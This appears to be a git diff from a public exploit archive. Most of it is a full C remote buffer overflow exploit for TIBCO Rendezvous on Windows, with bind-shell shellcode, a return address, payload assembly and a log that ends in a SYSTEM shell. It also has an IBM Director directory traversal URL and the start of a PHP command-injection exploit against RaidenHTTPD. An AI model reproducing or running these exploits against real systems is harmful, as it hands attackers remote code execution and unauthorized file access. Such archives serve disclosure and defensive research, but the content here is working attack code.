-+ router_name=AAAA..AAA&type=+Add+Router+
-
-- TIB/Rendezvous Secure Daemon (port 7580)
-+ POST /sd_add_network_service HTTP/1.0
-+ network=AAAA..AAAA&service=&type=Add
-
-- TIB/Rendezvous Secure Daemon (port 7580)
-+ certificate_from_file() lets remote user verify if remote file exists
-
-- TIB/Rendezvous Secure Daemon (port 7580)
-+ Authorized Subjects XSS vulnerability
-
-- TIB/Rendezvous Secure Routing Daemon (add router buffer overflow) (port 7580)
-+ POST /add_router HTTP/1.0
-+ router_name=AAAA..AAA&type=+Add+Router+
-
-- TIB/Rendezvous Agent for Java (TIB/Rendezvous Daemon Connection Buffer overflow) (port 7581)
-  + POST /set_main HTTP/1.0
-  + edit_listen=7600&edit_service=AAAA..AAAA&edit_network=&edit_daemon=&submit=Submit
-
-- TIB/Rendezvous Initial Value Cache (port 7581)
- + POST /change_services HTTP/1.0
- + Service=&Network=&Daemon=AAA&request_type=Submit
-
-Affected Operating systems:
--------------------------------
-- AIX 5.1 and up  RS/6000  
-- FreeBSD 4.2 and up x86
-- HP/UX 11.X  HPPA
-- HP/UX 11.22 and up IA-64/Itanium
-- Linux 2.4 kernel: 2.4.20 and up, glibc2.2.4 and up x86
-- Linux 2.4 kernel: 2.4.20 and up, glibc2.3 and up (includes 2.6 kernel)  x86
-- Linux 2.4 kernel: 2.4.18 and up, glibc2.3 and up IA-64/Itanium
-- OS/390 V2R6+ USS S/390 compatible OEM hardware
-- OS/400 V4R3+ AS/400
-- Solaris 2.7 and up Sparc
-- Solaris 2.7, 8, 9 (32-bit only)  x86
-- Solaris 2.10 (32- and 64-bit only)  x86
-- Tru64 Unix 5.1b Alpha
-- UnixWare 7.1 and up x86
-- VMS 7.2 and up
-- Alpha
-- Windows 2000/XP/2003 Server [MSVC V6.0 and V7.0] x86
-
-Usage:
--------
-
-D:\Programación\tibco>net start rvrd
-El servicio de TIB/Rendezvous Routing Communications Daemon está iniciándose.
-El servicio de TIB/Rendezvous Routing Communications Daemon se ha iniciado con éxito.
-
-
-D:\Programación\tibco>whoami
-REDBULL\atarasco
-
-D:\Programación\tibco>tibco.exe -e 192.168.0.1
-Tibco RendezVous rvrd, rvsrd remote exploit
-Author: Andres Tarasco ( atarasco @ sia.es)
-Url: http://www.514.es
-
-[+] Connection to Tibco HTTP Daemon..
-[+] Daemon Found: rvrd - version: 7.4.11
-[+] Connecting to Tibco SSL Service at port 9003
-[+] Sending Exploit ( 546 bytes)
-[+] Ignoring unknown CA...
-[+] Sending Exploit ( 546 bytes)
-[+] Exploit succesfully sent. Now telnet to port 51477
-
-D:\Programación\tibco>nc localhost 51477
-Microsoft Windows XP [Versión 5.1.2600]
-(C) Copyright 1985-2001 Microsoft Corp.
-
-C:\>whoami
-whoami
-NT AUTHORITY\SYSTEM
-
-C:\>
-
-*/
-
-struct _targets {
-   char *daemon;
-   char *name;
-   char *version;
-   char *target;
-   char *header;
-   char *tail;
-} TARGETS[] = { //supported versions
-{ "rvrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"},
-{ "rvsrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"},
-{ "rvsd","Secure Daemon","Generic win32","/sd_add_network_service","network=","&service=&type="},
-{ "rva","Agent for Java","Generic win32","/set_main","edit_listen=7600&edit_service=","&edit_network=&edit_daemon=&submit=Submit"},
-{ "rvcache","Initial Value Cache","Generic win32","/change_services","Service=&Network=&Daemon=","&request_type=Submit"},
-/* more versions here.... */
-};
-
-#include 
-#include  
-#include 
-#include 
-#include 
-#pragma comment(lib, "ws2_32.lib")
-#pragma comment(lib, "wininet.lib")
-
-unsigned char CALLESP[] ="\xed\x1e\x95\x7c";    //JMP ESP at ntdll.dll
-
-typedef struct _HTTPData {
-    unsigned char *buffer;
-    DWORD dwReturnCode;
-    DWORD dwBytesRead;
-    unsigned int DataOffset;
-} HTTPData, *PHTTPData;
-
-
-unsigned char jmpBack []= //JMP EBP -500 without nulls
-    "\x81\xec\xff\xff\xf4\x01"
-    "\x81\xc4\x0b\xfe\xf4\x01"
-    "\xff\xe4";
-
-
-unsigned char shellcode[] =
-/* win32_bind -  EXITFUNC=seh LPORT=51477 Size=346 Encoder=PexFnstenvSub http://metasploit.com */
-//Restricted chars: 0x00 0x06 0x07 0x08 0x0a 0x0d 0x20 0x22 0x28 0x29 0x30 0x5c 0xcd 0xf2
-"\x33\xc9\x66\x81\xe9\xb0\xff\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
-"\x13\x90\x90\x47\x87\x83\xeb\xfc\xe2\xf4\x6c\xfa\xac\xca\x78\x69"
-"\xb8\x78\x6f\xf0\xcc\xeb\xb4\xb4\xcc\xc2\xac\x1b\x3b\x82\xe8\x91"
-"\xa8\x0c\xdf\x88\xcc\xd8\xb0\x91\xac\xce\x1b\xa4\xcc\x86\x7e\xa1"
-"\x87\x1e\x3c\x14\x87\xf3\x97\x51\x8d\x8a\x91\x52\xac\x73\xab\xc4"
-"\x63\xaf\xe5\x75\xcc\xd8\xb4\x91\xac\xe1\x1b\x9c\x0c\x0c\xcf\x8c"
-"\x46\x6c\x93\xbc\xcc\x0e\xfc\xb4\x5b\xe6\x53\xa1\x9c\xe3\x1b\xd3"
-"\x77\x0c\xd0\x9c\xcc\xf7\x8c\x3d\xcc\xc7\x98\xce\x2f\x09\xde\x9e"
-"\xab\xd7\x6f\x46\x21\xd4\xf6\xf8\x74\xb5\xf8\xe7\x34\xb5\xcf\xc4"
-"\xb8\x57\xf8\x5b\xaa\x7b\xab\xc0\xb8\x51\xcf\x19\xa2\xe1\x11\x7d"
-"\x4f\x85\xc5\xfa\x45\x78\x40\xf8\x9e\x8e\x65\x3d\x10\x78\x46\xc3"
-"\x14\xd4\xc3\xc3\x04\xd4\xd3\xc3\xb8\x57\xf6\xf8\x8e\x92\xf6\xc3"
-"\xce\x66\x05\xf8\xe3\x9d\xe0\x57\x10\x78\x46\xfa\x57\xd6\xc5\x6f"
-"\x97\xef\x34\x3d\x69\x6e\xc7\x6f\x91\xd4\xc5\x6f\x97\xef\x75\xd9"
-"\xc1\xce\xc7\x6f\x91\xd7\xc4\xc4\x12\x78\x40\x03\x2f\x60\xe9\x56"
-"\x3e\xd0\x6f\x46\x12\x78\x40\xf6\x2d\xe3\xf6\xf8\x24\xea\x19\x75"
-"\x2d\xd7\xc9\xb9\x8b\x0e\x77\xfa\x03\x0e\x72\xa1\x87\x74\x3a\x6e"
-"\x05\xaa\x6e\xd2\x6b\x14\x1d\xea\x7f\x2c\x3b\x3b\x2f\xf5\x6e\x23"
-"\x51\x78\xe5\xd4\xb8\x51\xcb\xc7\x15\xd6\xc1\xc1\x2d\x86\xc1\xc1"
-"\x12\xd6\x6f\x40\x2f\x2a\x49\x95\x89\xd4\x6f\x46\x2d\x78\x6f\xa7"
-"\xb8\x57\x1b\xc7\xbb\x04\x54\xf4\xb8\x51\xc2\x6f\x97\xef\x60\x1a"
-"\x43\xd8\xc3\x6f\x91\x78\x40\x90\x47\x87";
-
-
-PHTTPData MakeHTTPRequest(char *host, DWORD port, char *metod,char *Url,int ssl, char *buffer);
-int GetSSLPort(char *buffer);
-void DumpMem(void* string, int length);
-/******************************************************************************/
-int GetSSLPort(char *buffer) {
-    char *p,*q;
-    p=strstr(buffer,"https://");
-    if (p) {
-        q=strchr(&p[8],':');
-        if (q) {
-         p=strchr(q,'/');
-         if (p)  {
-          p[0]='\0';return(atoi(q+1));
-         }
-        }
-    }
-    return(-1);
-}
-/******************************************************************************/
-int GetTibcoDaemon(char *buffer, char *daemon) {
-    char *p;
-    char *q;
-    char name[15];
-    int i;
-    static char SEPARADOR[]="color=\"#242424\">";  //"242424";
-
-    p=strstr(buffer,SEPARADOR);
-    if (p) {
-        p=p+strlen(SEPARADOR)+1;
-        while(p[0]==' ') p++;
-        q=strchr(&p[0],'<');
-        if (q) {
-            q[0]='\0';
-            printf("[+] Daemon Found: %s - ",p);
-            strncpy(name,p,14);
-            q=q+6;
-            while(q[0]==' ') q++;
-            p=strchr(&q[0],'<');
-            if (p) {
-                p[0]='\0';
-                printf("version: %s\n",q);
-            }
-            for(i=0;idwReturnCode = (DWORD)atol(bufQuery) ;
-//        printf("HEADER RESPONSE: %i \n",resultado->dwReturnCode);
-
-        dwLengthBufQuery=sizeof(bufQuery);
-        bQuery= HttpQueryInfo(hRequest, //petición de tamaño de la petición.
-                HTTP_QUERY_CONTENT_LENGTH,
-                bufQuery,
-                &dwLengthBufQuery,
-                NULL);
-        dwFileSize = (DWORD)atol(bufQuery) ;
-//        printf("Vamos a leer %i bytes de datos\n",dwFileSize);
-        resultado->dwBytesRead=dwFileSize;
-        if (dwFileSize==0) {
-            resultado->buffer=NULL;
-            InternetCloseHandle(hRequest);
-            InternetCloseHandle(hConnect);
-            InternetCloseHandle(hInternetSession);
-            return(resultado);
-        }
-        resultado->buffer= malloc(dwFileSize+1);
-        bRead = InternetReadFile(hRequest,
-                resultado->buffer,
-                dwFileSize,
-                &dwReadedBytes);
-        resultado->buffer[resultado->dwBytesRead] = '\0' ;
-
-    InternetCloseHandle(hRequest);
-    InternetCloseHandle(hConnect);
-    InternetCloseHandle(hInternetSession);
-    return(resultado);
-}
-/****************************************************************************/
-void usage(void) {
-    printf("Tibco.exe usage: -e parameters\n\n");
-    printf("Tibco.exe -e host (buffer overflow)\n");
-    exit(1);
-}
-/****************************************************************************/
-
-int main(int argc, char* argv[])
-{
-
- DWORD size,i,read,port=7580;
- unsigned char *buffer,datos[5000];
- HANDLE f;
- WSADATA wsaData;
- HTTPData *resultado;
- unsigned short bindport;
- signed int test;
- int dst;
- int t[0xff+1];
-
- printf("Tibco RendezVous rvrd, rvsrd remote exploit\n");
- printf("Author: Andres Tarasco ( atarasco @ sia.es)\n");
- printf("Url: http://www.514.es\n\n");
-
- if  (argc==3) {
-    if (argv[1][0]=='-') {
-        if (argv[1][1]!='e') {
-            usage();
-        }
-    }
- }  else {
-    usage();
- }
-
- WSAStartup(MAKEWORD(2, 2), &wsaData);
- printf("[+] Connection to Tibco HTTP Daemon..\n");
-
- 
- resultado= MakeHTTPRequest(argv[2], port, "GET","/ ",0, NULL);
- if (resultado->dwReturnCode!=200) {
-    printf("[-] Request Error (ErrorCode: %i)\n",resultado->dwReturnCode);
-    exit(1);
- }
- dst=GetTibcoDaemon(resultado->buffer,NULL); //Get Version
-//m/"#242424">(.*?)
    .*?(.*?)
    /
- if (dst==-1) {
-    printf("[-] Unknown Tibco Daemon (No donut for you)\n");
-    exit(1);
- }
-
- //BLINK! BLINK! BLINK!
-
- resultado= MakeHTTPRequest(argv[2], port, "GET","/daemon_parameters",0, NULL);
- port=GetSSLPort(resultado->buffer);
- if (!port) {
-    printf("[-] Unable to gather SSL port\n");
-    exit(1);
- }
- printf("[+] Connecting to Tibco SSL Service at port %i\n",port);
- if ((dst==0) || (dst==1) ) {
-    memset(datos,'\0',sizeof(datos)-1);
-
-    memcpy(datos,TARGETS[dst].header,strlen(TARGETS[dst].header));
-    memset(&datos[12],'A',498);
-    memcpy(&datos[16],shellcode,sizeof(shellcode)-1);
-    memcpy(&datos[12+498],CALLESP,4);
-    // memcpy(&datos[12+498],"AAAA",4);
-    memcpy(&datos[12+498+4],jmpBack,sizeof(jmpBack)); //Jump back ( EBP -500)
-    memcpy(&datos[12+498+4+sizeof(jmpBack)-1],TARGETS[dst].tail,strlen(TARGETS[dst].tail));
- }
-//    DumpMem(datos,strlen(datos));
-
- resultado= MakeHTTPRequest(argv[2], port, "POST","/add_router",1, datos);
- if (resultado->dwReturnCode==200) {
-    printf("[+] Exploit succesfully sent. Now telnet to port 51477\n");
-    //printf("resultado: %i\n",resultado->dwReturnCode);
-    //printf("resultado: %i\n",resultado->dwBytesRead);
-    //printf("datos: %s\n",resultado->buffer);
-    //DumpMem(resultado->buffer+300,strlen(resultado->buffer)-300);
-
- } else {
-    printf("[-] Exploit Failed\n");
-    printf("resultado: %i\n",resultado->dwReturnCode);
-    //printf("resultado: %i\n",resultado->dwBytesRead);
-    //printf("datos: %s\n",resultado->buffer);
-
- }
- return(1);
-}
-//---------------------------------------------------------------------------
-
-// milw0rm.com [2006-09-01]
+/*
+Exploit: TIBCO RendezVous remote buffer overflow exploit for Win32 (public version)
+Affected products: Tibco RendezOVous version <=7.4.11 (Multiple Vulnerabilities)
+Author: Andres Tarasco Acuña (atarasco @ sia.es )
+Advisory: http://www.514.es
+Url: http://www.sia.es
+Greetings: Iñaki Lopez and SIA TigerTeam
+Status: vulnerability fixed ( Vendor notification + fixes)
+
+Timeline:
+----------------
+Discovered: March 23, 2006
+Exploit coded: March 24, 2006
+Vendor Notified: March 27, 2006
+Vendor patch: May 15, 2006 - Tibco Rendezvous version 7.5  
+Public Disclosure: who knows
+
+
+Affected daemons:
+-----------------------
+- TIB/Rendezvous Routing Communications Daemon (add router buffer overflow) (port 7580)
++ POST /add_router HTTP/1.0
++ router_name=AAAA..AAA&type=+Add+Router+
+
+- TIB/Rendezvous Secure Daemon (port 7580)
++ POST /sd_add_network_service HTTP/1.0
++ network=AAAA..AAAA&service=&type=Add
+
+- TIB/Rendezvous Secure Daemon (port 7580)
++ certificate_from_file() lets remote user verify if remote file exists
+
+- TIB/Rendezvous Secure Daemon (port 7580)
++ Authorized Subjects XSS vulnerability
+
+- TIB/Rendezvous Secure Routing Daemon (add router buffer overflow) (port 7580)
++ POST /add_router HTTP/1.0
++ router_name=AAAA..AAA&type=+Add+Router+
+
+- TIB/Rendezvous Agent for Java (TIB/Rendezvous Daemon Connection Buffer overflow) (port 7581)
+  + POST /set_main HTTP/1.0
+  + edit_listen=7600&edit_service=AAAA..AAAA&edit_network=&edit_daemon=&submit=Submit
+
+- TIB/Rendezvous Initial Value Cache (port 7581)
+ + POST /change_services HTTP/1.0
+ + Service=&Network=&Daemon=AAA&request_type=Submit
+
+Affected Operating systems:
+-------------------------------
+- AIX 5.1 and up  RS/6000  
+- FreeBSD 4.2 and up x86
+- HP/UX 11.X  HPPA
+- HP/UX 11.22 and up IA-64/Itanium
+- Linux 2.4 kernel: 2.4.20 and up, glibc2.2.4 and up x86
+- Linux 2.4 kernel: 2.4.20 and up, glibc2.3 and up (includes 2.6 kernel)  x86
+- Linux 2.4 kernel: 2.4.18 and up, glibc2.3 and up IA-64/Itanium
+- OS/390 V2R6+ USS S/390 compatible OEM hardware
+- OS/400 V4R3+ AS/400
+- Solaris 2.7 and up Sparc
+- Solaris 2.7, 8, 9 (32-bit only)  x86
+- Solaris 2.10 (32- and 64-bit only)  x86
+- Tru64 Unix 5.1b Alpha
+- UnixWare 7.1 and up x86
+- VMS 7.2 and up
+- Alpha
+- Windows 2000/XP/2003 Server [MSVC V6.0 and V7.0] x86
+
+Usage:
+-------
+
+D:\Programación\tibco>net start rvrd
+El servicio de TIB/Rendezvous Routing Communications Daemon está iniciándose.
+El servicio de TIB/Rendezvous Routing Communications Daemon se ha iniciado con éxito.
+
+
+D:\Programación\tibco>whoami
+REDBULL\atarasco
+
+D:\Programación\tibco>tibco.exe -e 192.168.0.1
+Tibco RendezVous rvrd, rvsrd remote exploit
+Author: Andres Tarasco ( atarasco @ sia.es)
+Url: http://www.514.es
+
+[+] Connection to Tibco HTTP Daemon..
+[+] Daemon Found: rvrd - version: 7.4.11
+[+] Connecting to Tibco SSL Service at port 9003
+[+] Sending Exploit ( 546 bytes)
+[+] Ignoring unknown CA...
+[+] Sending Exploit ( 546 bytes)
+[+] Exploit succesfully sent. Now telnet to port 51477
+
+D:\Programación\tibco>nc localhost 51477
+Microsoft Windows XP [Versión 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\>whoami
+whoami
+NT AUTHORITY\SYSTEM
+
+C:\>
+
+*/
+
+struct _targets {
+   char *daemon;
+   char *name;
+   char *version;
+   char *target;
+   char *header;
+   char *tail;
+} TARGETS[] = { //supported versions
+{ "rvrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"},
+{ "rvsrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"},
+{ "rvsd","Secure Daemon","Generic win32","/sd_add_network_service","network=","&service=&type="},
+{ "rva","Agent for Java","Generic win32","/set_main","edit_listen=7600&edit_service=","&edit_network=&edit_daemon=&submit=Submit"},
+{ "rvcache","Initial Value Cache","Generic win32","/change_services","Service=&Network=&Daemon=","&request_type=Submit"},
+/* more versions here.... */
+};
+
+#include 
+#include  
+#include 
+#include 
+#include 
+#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, "wininet.lib")
+
+unsigned char CALLESP[] ="\xed\x1e\x95\x7c";    //JMP ESP at ntdll.dll
+
+typedef struct _HTTPData {
+    unsigned char *buffer;
+    DWORD dwReturnCode;
+    DWORD dwBytesRead;
+    unsigned int DataOffset;
+} HTTPData, *PHTTPData;
+
+
+unsigned char jmpBack []= //JMP EBP -500 without nulls
+    "\x81\xec\xff\xff\xf4\x01"
+    "\x81\xc4\x0b\xfe\xf4\x01"
+    "\xff\xe4";
+
+
+unsigned char shellcode[] =
+/* win32_bind -  EXITFUNC=seh LPORT=51477 Size=346 Encoder=PexFnstenvSub http://metasploit.com */
+//Restricted chars: 0x00 0x06 0x07 0x08 0x0a 0x0d 0x20 0x22 0x28 0x29 0x30 0x5c 0xcd 0xf2
+"\x33\xc9\x66\x81\xe9\xb0\xff\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
+"\x13\x90\x90\x47\x87\x83\xeb\xfc\xe2\xf4\x6c\xfa\xac\xca\x78\x69"
+"\xb8\x78\x6f\xf0\xcc\xeb\xb4\xb4\xcc\xc2\xac\x1b\x3b\x82\xe8\x91"
+"\xa8\x0c\xdf\x88\xcc\xd8\xb0\x91\xac\xce\x1b\xa4\xcc\x86\x7e\xa1"
+"\x87\x1e\x3c\x14\x87\xf3\x97\x51\x8d\x8a\x91\x52\xac\x73\xab\xc4"
+"\x63\xaf\xe5\x75\xcc\xd8\xb4\x91\xac\xe1\x1b\x9c\x0c\x0c\xcf\x8c"
+"\x46\x6c\x93\xbc\xcc\x0e\xfc\xb4\x5b\xe6\x53\xa1\x9c\xe3\x1b\xd3"
+"\x77\x0c\xd0\x9c\xcc\xf7\x8c\x3d\xcc\xc7\x98\xce\x2f\x09\xde\x9e"
+"\xab\xd7\x6f\x46\x21\xd4\xf6\xf8\x74\xb5\xf8\xe7\x34\xb5\xcf\xc4"
+"\xb8\x57\xf8\x5b\xaa\x7b\xab\xc0\xb8\x51\xcf\x19\xa2\xe1\x11\x7d"
+"\x4f\x85\xc5\xfa\x45\x78\x40\xf8\x9e\x8e\x65\x3d\x10\x78\x46\xc3"
+"\x14\xd4\xc3\xc3\x04\xd4\xd3\xc3\xb8\x57\xf6\xf8\x8e\x92\xf6\xc3"
+"\xce\x66\x05\xf8\xe3\x9d\xe0\x57\x10\x78\x46\xfa\x57\xd6\xc5\x6f"
+"\x97\xef\x34\x3d\x69\x6e\xc7\x6f\x91\xd4\xc5\x6f\x97\xef\x75\xd9"
+"\xc1\xce\xc7\x6f\x91\xd7\xc4\xc4\x12\x78\x40\x03\x2f\x60\xe9\x56"
+"\x3e\xd0\x6f\x46\x12\x78\x40\xf6\x2d\xe3\xf6\xf8\x24\xea\x19\x75"
+"\x2d\xd7\xc9\xb9\x8b\x0e\x77\xfa\x03\x0e\x72\xa1\x87\x74\x3a\x6e"
+"\x05\xaa\x6e\xd2\x6b\x14\x1d\xea\x7f\x2c\x3b\x3b\x2f\xf5\x6e\x23"
+"\x51\x78\xe5\xd4\xb8\x51\xcb\xc7\x15\xd6\xc1\xc1\x2d\x86\xc1\xc1"
+"\x12\xd6\x6f\x40\x2f\x2a\x49\x95\x89\xd4\x6f\x46\x2d\x78\x6f\xa7"
+"\xb8\x57\x1b\xc7\xbb\x04\x54\xf4\xb8\x51\xc2\x6f\x97\xef\x60\x1a"
+"\x43\xd8\xc3\x6f\x91\x78\x40\x90\x47\x87";
+
+
+PHTTPData MakeHTTPRequest(char *host, DWORD port, char *metod,char *Url,int ssl, char *buffer);
+int GetSSLPort(char *buffer);
+void DumpMem(void* string, int length);
+/******************************************************************************/
+int GetSSLPort(char *buffer) {
+    char *p,*q;
+    p=strstr(buffer,"https://");
+    if (p) {
+        q=strchr(&p[8],':');
+        if (q) {
+         p=strchr(q,'/');
+         if (p)  {
+          p[0]='\0';return(atoi(q+1));
+         }
+        }
+    }
+    return(-1);
+}
+/******************************************************************************/
+int GetTibcoDaemon(char *buffer, char *daemon) {
+    char *p;
+    char *q;
+    char name[15];
+    int i;
+    static char SEPARADOR[]="color=\"#242424\">";  //"242424";
+
+    p=strstr(buffer,SEPARADOR);
+    if (p) {
+        p=p+strlen(SEPARADOR)+1;
+        while(p[0]==' ') p++;
+        q=strchr(&p[0],'<');
+        if (q) {
+            q[0]='\0';
+            printf("[+] Daemon Found: %s - ",p);
+            strncpy(name,p,14);
+            q=q+6;
+            while(q[0]==' ') q++;
+            p=strchr(&q[0],'<');
+            if (p) {
+                p[0]='\0';
+                printf("version: %s\n",q);
+            }
+            for(i=0;idwReturnCode = (DWORD)atol(bufQuery) ;
+//        printf("HEADER RESPONSE: %i \n",resultado->dwReturnCode);
+
+        dwLengthBufQuery=sizeof(bufQuery);
+        bQuery= HttpQueryInfo(hRequest, //petición de tamaño de la petición.
+                HTTP_QUERY_CONTENT_LENGTH,
+                bufQuery,
+                &dwLengthBufQuery,
+                NULL);
+        dwFileSize = (DWORD)atol(bufQuery) ;
+//        printf("Vamos a leer %i bytes de datos\n",dwFileSize);
+        resultado->dwBytesRead=dwFileSize;
+        if (dwFileSize==0) {
+            resultado->buffer=NULL;
+            InternetCloseHandle(hRequest);
+            InternetCloseHandle(hConnect);
+            InternetCloseHandle(hInternetSession);
+            return(resultado);
+        }
+        resultado->buffer= malloc(dwFileSize+1);
+        bRead = InternetReadFile(hRequest,
+                resultado->buffer,
+                dwFileSize,
+                &dwReadedBytes);
+        resultado->buffer[resultado->dwBytesRead] = '\0' ;
+
+    InternetCloseHandle(hRequest);
+    InternetCloseHandle(hConnect);
+    InternetCloseHandle(hInternetSession);
+    return(resultado);
+}
+/****************************************************************************/
+void usage(void) {
+    printf("Tibco.exe usage: -e parameters\n\n");
+    printf("Tibco.exe -e host (buffer overflow)\n");
+    exit(1);
+}
+/****************************************************************************/
+
+int main(int argc, char* argv[])
+{
+
+ DWORD size,i,read,port=7580;
+ unsigned char *buffer,datos[5000];
+ HANDLE f;
+ WSADATA wsaData;
+ HTTPData *resultado;
+ unsigned short bindport;
+ signed int test;
+ int dst;
+ int t[0xff+1];
+
+ printf("Tibco RendezVous rvrd, rvsrd remote exploit\n");
+ printf("Author: Andres Tarasco ( atarasco @ sia.es)\n");
+ printf("Url: http://www.514.es\n\n");
+
+ if  (argc==3) {
+    if (argv[1][0]=='-') {
+        if (argv[1][1]!='e') {
+            usage();
+        }
+    }
+ }  else {
+    usage();
+ }
+
+ WSAStartup(MAKEWORD(2, 2), &wsaData);
+ printf("[+] Connection to Tibco HTTP Daemon..\n");
+
+ 
+ resultado= MakeHTTPRequest(argv[2], port, "GET","/ ",0, NULL);
+ if (resultado->dwReturnCode!=200) {
+    printf("[-] Request Error (ErrorCode: %i)\n",resultado->dwReturnCode);
+    exit(1);
+ }
+ dst=GetTibcoDaemon(resultado->buffer,NULL); //Get Version
+//m/"#242424">(.*?)
    .*?(.*?)
    /
+ if (dst==-1) {
+    printf("[-] Unknown Tibco Daemon (No donut for you)\n");
+    exit(1);
+ }
+
+ //BLINK! BLINK! BLINK!
+
+ resultado= MakeHTTPRequest(argv[2], port, "GET","/daemon_parameters",0, NULL);
+ port=GetSSLPort(resultado->buffer);
+ if (!port) {
+    printf("[-] Unable to gather SSL port\n");
+    exit(1);
+ }
+ printf("[+] Connecting to Tibco SSL Service at port %i\n",port);
+ if ((dst==0) || (dst==1) ) {
+    memset(datos,'\0',sizeof(datos)-1);
+
+    memcpy(datos,TARGETS[dst].header,strlen(TARGETS[dst].header));
+    memset(&datos[12],'A',498);
+    memcpy(&datos[16],shellcode,sizeof(shellcode)-1);
+    memcpy(&datos[12+498],CALLESP,4);
+    // memcpy(&datos[12+498],"AAAA",4);
+    memcpy(&datos[12+498+4],jmpBack,sizeof(jmpBack)); //Jump back ( EBP -500)
+    memcpy(&datos[12+498+4+sizeof(jmpBack)-1],TARGETS[dst].tail,strlen(TARGETS[dst].tail));
+ }
+//    DumpMem(datos,strlen(datos));
+
+ resultado= MakeHTTPRequest(argv[2], port, "POST","/add_router",1, datos);
+ if (resultado->dwReturnCode==200) {
+    printf("[+] Exploit succesfully sent. Now telnet to port 51477\n");
+    //printf("resultado: %i\n",resultado->dwReturnCode);
+    //printf("resultado: %i\n",resultado->dwBytesRead);
+    //printf("datos: %s\n",resultado->buffer);
+    //DumpMem(resultado->buffer+300,strlen(resultado->buffer)-300);
+
+ } else {
+    printf("[-] Exploit Failed\n");
+    printf("resultado: %i\n",resultado->dwReturnCode);
+    //printf("resultado: %i\n",resultado->dwBytesRead);
+    //printf("datos: %s\n",resultado->buffer);
+
+ }
+ return(1);
+}
+//---------------------------------------------------------------------------
+
+// milw0rm.com [2006-09-01]
diff --git a/platforms/windows/remote/23.c b/platforms/windows/remote/23.c
index aa483fc65..64a7abb22 100755
--- a/platforms/windows/remote/23.c
+++ b/platforms/windows/remote/23.c
@@ -146,6 +146,6 @@ void usage()
 printf("\nUsage: \n");
 exit(0);
 }
-
-
-// milw0rm.com [2003-04-30]
+
+
+// milw0rm.com [2003-04-30]
diff --git a/platforms/windows/remote/232.c b/platforms/windows/remote/232.c
index 7a8c0301b..eb7c4565f 100755
--- a/platforms/windows/remote/232.c
+++ b/platforms/windows/remote/232.c
@@ -552,6 +552,6 @@ int main(int ac, char *av[])
   close(t);
 
   return 0;
-}
-
-// milw0rm.com [2000-12-19]
+}
+
+// milw0rm.com [2000-12-19]
diff --git a/platforms/windows/remote/2320.txt b/platforms/windows/remote/2320.txt
index a6f191c6d..cab5303b8 100755
--- a/platforms/windows/remote/2320.txt
+++ b/platforms/windows/remote/2320.txt
@@ -1,12 +1,12 @@
-There is a vulnerability within the Redirect.bat file on a ibm director
-cgi which allows a directory transversal to take place which in turn
-exposes most files on the system to be read without authorization.
-
-http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here)
-
-
-This was fixed in the 5.10 version of ibm director.
-
--Daniel Clemens
-
-# milw0rm.com [2006-09-07]
+There is a vulnerability within the Redirect.bat file on a ibm director
+cgi which allows a directory transversal to take place which in turn
+exposes most files on the system to be read without authorization.
+
+http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here)
+
+
+This was fixed in the 5.10 version of ibm director.
+
+-Daniel Clemens
+
+# milw0rm.com [2006-09-07]
diff --git a/platforms/windows/remote/2328.php b/platforms/windows/remote/2328.php
index 24afec2bd..63f62c0b0 100755
--- a/platforms/windows/remote/2328.php
+++ b/platforms/windows/remote/2328.php
@@ -1,147 +1,147 @@
-#!/usr/bin/php -q -d short_open_tag=on
- 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$cmd="";
-$port=80;
-$proxy="";
-for ($i=2; $i<$argc; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-if ($proxy=='') {$p="/";} else {$p='http://'.$host.':'.$port."/";}
-
-$data ="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"SoftParserFileXml\"; filename=\"suntzu\";\r\n";
-$data.="Content-Type: image/jpeg;\r\n\r\n";
-$data.="\r\n";
-$data.="-----------------------------7d529a1d23092a--\r\n";
-$packet ="POST ".$p."raidenhttpd-admin/slice/check.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="SUNTZU: $cmd\r\n";
